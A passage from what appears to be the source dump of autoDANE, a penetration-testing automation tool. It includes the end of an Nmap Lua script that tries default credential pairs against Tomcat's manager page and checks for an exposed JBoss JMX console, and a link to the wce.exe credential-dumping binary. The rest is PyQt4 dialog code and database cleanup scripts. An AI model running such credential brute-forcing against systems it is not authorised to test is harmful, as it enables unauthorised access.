  local jboss = http.get(host, port, "/jmx-console/HtmlAdaptor")

  -- No manager application at this path: report that (and an exposed JMX
  -- console, if it answered 200) and stop.
  if answer.status == 404 then
    result[#result + 1] = string.format("/manager/html is HTTP %d.", answer.status)
    if jboss.status == 200 then
      result[#result + 1] = string.format("[+] Jboss JMX console is HTTP %d !", jboss.status)
    end
    return table.concat(result, "\n")
  end

  -- NOTE(review): every status other than 404 and 401 is reported as
  -- "No auth required", which includes 403, redirects and server errors.
  if answer.status ~= 401 then
    result[#result + 1] = string.format("No auth required. (HTTP %d)", answer.status)
    return table.concat(result, "\n")
  end

  result[#result + 1] = answer["status-line"]

  www_authenticate = answer.header["www-authenticate"]
  if not www_authenticate then
    result[#result + 1] = string.format("Server returned status %d but no WWW-Authenticate.", answer.status)
    return table.concat(result, "\n")
  end
  challenges = http.parse_www_authenticate(www_authenticate)
  if not challenges then
    result[#result + 1] = string.format("Server returned status %d but the WWW-Authenticate header could not be parsed.", answer.status)
    result[#result + 1] = string.format("WWW-Authenticate: %s", www_authenticate)
    return table.concat(result, "\n")
  end

  -- Remember the Basic challenge (the last one, if several are offered) and
  -- echo each challenge with its parameters.
  basic_challenge = nil
  for _, challenge in ipairs(challenges) do
    if challenge.scheme == "Basic" then
      basic_challenge = challenge
    end
    local line = challenge.scheme
    for name, value in pairs(challenge.params) do
      line = line .. string.format(" %s=%s", name, value)
      -- NOTE(review): the comparison is applied to every challenge parameter,
      -- not only to one named realm, so any other parameter value also ends
      -- the script here with "is not tomcat".
      if value ~= "Tomcat Manager Application" then -- Not Tomcat, so stop here
        result[#result + 1] = string.format("%s is not tomcat.", value)
        return table.concat(result, "\n")
      end
    end
    result[#result + 1] = line
  end

  if basic_challenge then
    for _, auth in ipairs(authcombinations) do
      answer = http.get(host, port, '/manager/html', {auth = auth})
      -- 403: reported as credentials accepted but the manager unavailable.
      -- NOTE(review): answer.status is passed without a matching format
      -- specifier, and the message text spells "disabled" as "disbaled".
      if answer.status == 403 then
        result[#result + 1] = string.format("[=] Tomcat will accept %s:%s, but management is disbaled.", auth.username, auth.password, answer.status)
        return table.concat(result, "\n")
      end
      -- Anything other than 401/403 is reported as a working pair; the 403
      -- test is already handled by the return above.
      if answer.status ~= 401 and answer.status ~= 403 then
        result[#result + 1] = string.format("[+] Found combination %s:%s !", auth.username, auth.password)
        return table.concat(result, "\n")
      end
    end
    -- Reached only when no pair returned early; answer is the last response.
    if answer.status == 401 then
      result[#result + 1] = string.format("[-] The password was not found.")
    end
  end

  return table.concat(result, "\n")
end
147 |
--------------------------------------------------------------------------------
/software/wce/test.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/wce/test.txt
--------------------------------------------------------------------------------
/software/wce/wce.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/wce/wce.exe
--------------------------------------------------------------------------------
/splash/Ui_dbconnecting.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/splash/dbconnecting.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Use QString.fromUtf8 when QtCore provides QString; otherwise fall back to
# an identity function that returns its argument unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

# Pass the UnicodeUTF8 encoding to translate() when QApplication defines it;
# otherwise call translate() without an encoding argument.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Widget layout for the database-connection splash dialog.

    Generated from dbconnecting.ui by the PyQt4 UI code generator; the file
    header warns that manual changes are lost on regeneration.
    """

    def setupUi(self, Dialog):
        """Create the widgets and layouts on *Dialog* and wire up its slots."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(581, 433)
        Dialog.setSizeGripEnabled(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Row 1: logo label between two expanding horizontal spacers
        self.horizontalLayout_4 = QtGui.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem)
        self.lblDBLogo = QtGui.QLabel(Dialog)
        self.lblDBLogo.setMinimumSize(QtCore.QSize(310, 310))
        self.lblDBLogo.setObjectName(_fromUtf8("lblDBLogo"))
        self.horizontalLayout_4.addWidget(self.lblDBLogo)
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem1)
        self.verticalLayout.addLayout(self.horizontalLayout_4)
        # Expanding vertical spacer between the logo row and the text rows
        spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem2)
        # Row 2: status label ("Connecting ")
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout_3.addWidget(self.label)
        self.verticalLayout.addLayout(self.horizontalLayout_3)
        # Row 3: error label
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.lblError = QtGui.QLabel(Dialog)
        self.lblError.setObjectName(_fromUtf8("lblError"))
        self.horizontalLayout_2.addWidget(self.lblError)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Row 4: expanding spacer followed by the Cancel button
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem3)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout.addWidget(self.btnCancel)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)

        self.retranslateUi(Dialog)
        # Connects on_<objectName>_<signal> methods by name
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the window title and the initial text of every widget."""
        Dialog.setWindowTitle(_translate("Dialog", "Connecting to DB", None))
        self.lblDBLogo.setText(_translate("Dialog", "DB Logo", None))
        self.label.setText(_translate("Dialog", "Connecting ", None))
        self.lblError.setText(_translate("Dialog", "...", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
78 |
79 |
# Standalone preview: show the bare dialog when this module is run directly.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    Dialog = QtGui.QDialog()
    ui = Ui_Dialog()
    ui.setupUi(Dialog)
    Dialog.show()
    sys.exit(app.exec_())
88 |
89 |
--------------------------------------------------------------------------------
/splash/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/splash/__init__.py
--------------------------------------------------------------------------------
/splash/dbconnecting.py:
--------------------------------------------------------------------------------
1 | from PyQt4 import QtGui, QtCore
2 | from PyQt4.QtCore import pyqtSignature, pyqtSignal
3 | from PyQt4.QtGui import *
4 |
5 |
6 | from PyQt4.QtCore import QString
7 | #from PyQt4.QtGui import QApplication
8 |
9 | import ConfigParser
10 | import threading
11 | import psycopg2
12 | import time
13 |
14 | from .Ui_dbconnecting import Ui_Dialog
15 |
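class DBConnecting(QDialog, Ui_Dialog):
    '''
    Splash dialog shown while waiting for the PostgreSQL database.

    A threading.Timer callback tries to connect with the values from the
    [postgres] section of settings.ini and then emits tickLabelTimerTrigger.
    The connected slot either accepts the dialog or schedules the next
    attempt. Rejecting the dialog stops the retry loop.
    '''

    tickLabelTimerTrigger = pyqtSignal()
    tickLabelTimer = None       # most recently scheduled retry timer
    currentDotsVal = ""         # animated "..." suffix of the status label
    connectedToDB = False
    cancelled = False           # set once the dialog has been rejected
    errorMessage = ""           # text of the last connection error
    conf = ConfigParser.ConfigParser()

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)
        # settings.ini is resolved against the current working directory and
        # supplies the PostgreSQL password in clear text, so the file should
        # be readable only by the account that runs the tool.
        self.conf.read("settings.ini")
        self.tickLabelTimerTrigger.connect(self.handletickLabelTimerTrigger)
        self._scheduleAttempt()

        logoPixmap = QtGui.QPixmap(QString.fromUtf8('images/db-connection.jpg'))
        logoScaledPixmap = logoPixmap.scaled(self.lblDBLogo.size(), QtCore.Qt.KeepAspectRatio)
        self.lblDBLogo.setPixmap(logoScaledPixmap)

    def _scheduleAttempt(self):
        '''Start a 0.5 s timer for the next attempt and keep a handle to it.'''
        self.tickLabelTimer = threading.Timer(0.5, self.calltickLabelTimerTrigger)
        self.tickLabelTimer.start()

    def calltickLabelTimerTrigger(self):
        '''
        Timer-thread callback: try one connection, record the outcome and
        notify the GUI through tickLabelTimerTrigger.
        '''
        if self.cancelled:
            return

        try:
            conn = psycopg2.connect(host=self.conf.get('postgres', 'host'), user=self.conf.get('postgres', 'user'), password=self.conf.get('postgres', 'pass'), dbname=self.conf.get('postgres', 'db'))
            # Only reachability is tested, so close the probe connection
            # explicitly instead of leaving that to garbage collection.
            conn.close()
            self.connectedToDB = True
        except Exception as e:
            self.errorMessage = str(e)
            time.sleep(1)

        self.tickLabelTimerTrigger.emit()

    def handletickLabelTimerTrigger(self):
        '''
        Slot for tickLabelTimerTrigger: accept the dialog once connected,
        otherwise schedule another attempt and refresh the labels.
        '''
        # An attempt that was already running when the dialog was rejected
        # must neither accept the dialog nor start another timer.
        if self.cancelled:
            return

        if (self.connectedToDB):
            self.accept()
        else:
            self._scheduleAttempt()
            self.currentDotsVal += "."
            if self.currentDotsVal == "....":
                self.currentDotsVal = ""

            self.label.setText("Connecting " + self.currentDotsVal)
            self.lblError.setText(self.errorMessage)

    def reject(self):
        '''Stop retrying before closing the dialog as rejected.'''
        self.cancelled = True
        if self.tickLabelTimer is not None:
            # No effect if the timer has already fired; the cancelled flag
            # covers that case.
            self.tickLabelTimer.cancel()
        QDialog.reject(self)

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        self.reject()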
61 |
--------------------------------------------------------------------------------
/splash/dbconnecting.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 581
10 | 433
11 |
12 |
13 |
14 | Connecting to DB
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 | Qt::Horizontal
28 |
29 |
30 |
31 | 40
32 | 20
33 |
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 | 310
42 | 310
43 |
44 |
45 |
46 | DB Logo
47 |
48 |
49 |
50 | -
51 |
52 |
53 | Qt::Horizontal
54 |
55 |
56 |
57 | 40
58 | 20
59 |
60 |
61 |
62 |
63 |
64 |
65 | -
66 |
67 |
68 | Qt::Vertical
69 |
70 |
71 |
72 | 20
73 | 40
74 |
75 |
76 |
77 |
78 | -
79 |
80 |
-
81 |
82 |
83 | Connecting
84 |
85 |
86 |
87 |
88 |
89 | -
90 |
91 |
-
92 |
93 |
94 | ...
95 |
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 | Qt::Horizontal
106 |
107 |
108 |
109 | 40
110 | 20
111 |
112 |
113 |
114 |
115 | -
116 |
117 |
118 | Cancel
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
--------------------------------------------------------------------------------
/truncate:
--------------------------------------------------------------------------------
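#!/bin/bash
#
# Empty the autodane database tables and delete the files under logs/ and temp/.

# Abort on the first failing command or unset variable, so the log and temp
# files are not deleted when the database step did not succeed.
set -eu

# truncate.sql, logs/ and temp/ are addressed relative to this script; change
# to its directory so that running it from elsewhere cannot delete another
# directory's logs/ or temp/ contents.
cd "$(dirname "$0")"

# ON_ERROR_STOP makes psql exit non-zero when a statement fails.
sudo -su postgres bash -c "psql -v ON_ERROR_STOP=1 autodane < truncate.sql"

# -f: an empty directory is not an error; --: file names are never read as options.
rm -f -- logs/*
rm -f -- temp/*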
6 |
--------------------------------------------------------------------------------
/truncate.sql:
--------------------------------------------------------------------------------
-- Empties every table listed below, one statement per table.
-- RESTART IDENTITY also restarts the sequences owned by each table's columns.
TRUNCATE TABLE domain_credentials RESTART IDENTITY;
TRUNCATE TABLE domain_credentials_map RESTART IDENTITY;
TRUNCATE TABLE domain_groups RESTART IDENTITY;
TRUNCATE TABLE domain_user_group_map RESTART IDENTITY;
TRUNCATE TABLE domains RESTART IDENTITY;
TRUNCATE TABLE exploit_logs RESTART IDENTITY;
TRUNCATE TABLE footprints RESTART IDENTITY;
TRUNCATE TABLE host_data RESTART IDENTITY;
TRUNCATE TABLE local_credentials RESTART IDENTITY;
TRUNCATE TABLE local_credentials_map RESTART IDENTITY;
TRUNCATE TABLE net_ranges RESTART IDENTITY;
TRUNCATE TABLE port_data RESTART IDENTITY;
TRUNCATE TABLE scope RESTART IDENTITY;
TRUNCATE TABLE task_list RESTART IDENTITY;
TRUNCATE TABLE tokens RESTART IDENTITY;
TRUNCATE TABLE vulnerabilities RESTART IDENTITY;
TRUNCATE TABLE websites RESTART IDENTITY;
18 |
--------------------------------------------------------------------------------
/worker/.workerthread.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/.workerthread.py.swo
--------------------------------------------------------------------------------
/worker/.workerthread.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/.workerthread.py.swp
--------------------------------------------------------------------------------
/worker/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/__init__.py
--------------------------------------------------------------------------------